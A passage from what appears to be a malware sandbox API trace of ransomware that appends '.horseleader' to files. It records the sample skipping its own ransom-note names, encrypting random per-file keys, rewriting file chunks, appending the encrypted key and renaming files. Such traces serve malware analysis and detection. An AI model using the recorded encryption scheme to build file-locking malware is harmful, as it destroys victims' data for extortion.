NNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.562] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.562] CloseHandle (hObject=0x158) returned 1 [0248.562] GetProcessHeap () returned 0x780000 [0248.562] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.562] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd541900, ftCreationTime.dwHighDateTime=0x1c911ec, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd541900, ftLastWriteTime.dwHighDateTime=0x1c911ec, nFileSizeHigh=0x0, nFileSizeLow=0x205b0b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1AR.LEX", cAlternateFileName="")) returned 1 [0248.562] lstrcmpiW (lpString1="MSB1AR.LEX", lpString2="Windows") returned -1 [0248.562] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned 70 [0248.562] StrStrIW (lpFirst="MSB1AR.LEX", lpSrch=".horseleader") returned 0x0 [0248.563] lstrcmpW (lpString1="MSB1AR.LEX", lpString2="#Decrypt#.txt") returned 1 [0248.563] lstrcmpW (lpString1="MSB1AR.LEX", lpString2="_uninstalling_.png") returned 1 [0248.563] lstrlenW (lpString=".testttjffg") returned 11 [0248.563] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX", lpSrch=".testttjffg") returned 0x0 [0248.563] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.563] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.563] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.564] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned 70 [0248.564] StrStrW (lpFirst="MSB1AR.LEX", lpSrch=".txt") returned 0x0 [0248.564] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2120459) returned 1 [0248.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.564] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.589] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.589] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.590] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x100585, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.590] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.600] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.600] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.601] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x200b0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.601] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.606] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.606] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.607] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.607] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.607] CloseHandle (hObject=0x158) returned 1 [0248.607] GetProcessHeap () returned 0x780000 [0248.607] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.607] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.horseleader") returned 82 [0248.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.horseleader")) returned 1 [0248.609] GetProcessHeap () returned 0x780000 [0248.609] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.609] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7780a100, ftCreationTime.dwHighDateTime=0x1c4d75f, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7780a100, ftLastWriteTime.dwHighDateTime=0x1c4d75f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1CACH.LEX", cAlternateFileName="")) returned 1 [0248.609] lstrcmpiW (lpString1="MSB1CACH.LEX", lpString2="Windows") returned -1 [0248.609] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned 72 [0248.609] StrStrIW (lpFirst="MSB1CACH.LEX", lpSrch=".horseleader") returned 0x0 [0248.609] lstrcmpW (lpString1="MSB1CACH.LEX", lpString2="#Decrypt#.txt") returned 1 [0248.609] lstrcmpW (lpString1="MSB1CACH.LEX", lpString2="_uninstalling_.png") returned 1 [0248.609] lstrlenW (lpString=".testttjffg") returned 11 [0248.609] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX", lpSrch=".testttjffg") returned 0x0 [0248.609] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.609] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.611] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned 72 [0248.611] StrStrW (lpFirst="MSB1CACH.LEX", lpSrch=".txt") returned 0x0 [0248.611] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1536) returned 1 [0248.611] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0248.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.614] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x600, lpOverlapped=0x0) returned 1 [0248.614] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.614] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.614] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.615] CloseHandle (hObject=0x158) returned 1 [0248.615] GetProcessHeap () returned 0x780000 [0248.615] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.615] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.horseleader") returned 84 [0248.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1cach.lex.horseleader")) returned 1 [0248.616] GetProcessHeap () returned 0x780000 [0248.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.616] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c6bc00, ftCreationTime.dwHighDateTime=0x1ca9121, ftLastAccessTime.dwLowDateTime=0x58b4ce70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd5c6bc00, ftLastWriteTime.dwHighDateTime=0x1ca9121, nFileSizeHigh=0x0, nFileSizeLow=0x2b990, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1CORE.DLL", cAlternateFileName="")) returned 1 [0248.616] lstrcmpiW (lpString1="MSB1CORE.DLL", lpString2="Windows") returned -1 [0248.616] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL") returned 72 [0248.616] StrStrIW (lpFirst="MSB1CORE.DLL", lpSrch=".horseleader") returned 0x0 [0248.616] lstrcmpW (lpString1="MSB1CORE.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.616] lstrcmpW (lpString1="MSB1CORE.DLL", lpString2="_uninstalling_.png") returned 1 [0248.616] lstrlenW (lpString=".testttjffg") returned 11 [0248.616] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL", lpSrch=".testttjffg") returned 0x0 [0248.617] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.617] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.617] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL") returned 72 [0248.624] StrStrW (lpFirst="MSB1CORE.DLL", lpSrch=".txt") returned 0x0 [0248.624] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=178576) returned 1 [0248.624] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.624] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.633] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.633] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.634] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x134c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.634] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.707] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.708] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x26990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.708] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.723] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.723] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.723] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.723] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.723] CloseHandle (hObject=0x158) returned 1 [0248.723] GetProcessHeap () returned 0x780000 [0248.724] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.724] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL.horseleader") returned 84 [0248.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1core.dll.horseleader")) returned 1 [0248.725] GetProcessHeap () returned 0x780000 [0248.725] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.725] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c6e400, ftCreationTime.dwHighDateTime=0x1ca6d6a, ftLastAccessTime.dwLowDateTime=0x7588f30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x38c6e400, ftLastWriteTime.dwHighDateTime=0x1ca6d6a, nFileSizeHigh=0x0, nFileSizeLow=0x40f70, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1STAR.DLL", cAlternateFileName="")) returned 1 [0248.725] lstrcmpiW (lpString1="MSB1STAR.DLL", lpString2="Windows") returned -1 [0248.725] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL") returned 72 [0248.725] StrStrIW (lpFirst="MSB1STAR.DLL", lpSrch=".horseleader") returned 0x0 [0248.725] lstrcmpW (lpString1="MSB1STAR.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.725] lstrcmpW (lpString1="MSB1STAR.DLL", lpString2="_uninstalling_.png") returned 1 [0248.725] lstrlenW (lpString=".testttjffg") returned 11 [0248.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL", lpSrch=".testttjffg") returned 0x0 [0248.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0248.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0248.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.726] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL") returned 72 [0248.726] StrStrW (lpFirst="MSB1STAR.DLL", lpSrch=".txt") returned 0x0 [0248.726] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=266096) returned 1 [0248.726] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.726] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.731] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.731] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.731] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1dfb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.731] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.774] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.774] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.775] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3bf70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.775] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.777] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.777] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0248.777] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.777] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0248.777] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0248.778] CloseHandle (hObject=0x158) returned 1 [0248.778] GetProcessHeap () returned 0x780000 [0248.778] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.778] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL.horseleader") returned 84 [0248.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1star.dll.horseleader")) returned 1 [0248.779] GetProcessHeap () returned 0x780000 [0248.779] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.779] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4958f00, ftCreationTime.dwHighDateTime=0x1ca9121, ftLastAccessTime.dwLowDateTime=0x58b4ce70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd4958f00, ftLastWriteTime.dwHighDateTime=0x1ca9121, nFileSizeHigh=0x0, nFileSizeLow=0x11390, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1XTOR.DLL", cAlternateFileName="")) returned 1 [0248.779] lstrcmpiW (lpString1="MSB1XTOR.DLL", lpString2="Windows") returned -1 [0248.780] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL") returned 72 [0248.780] StrStrIW (lpFirst="MSB1XTOR.DLL", 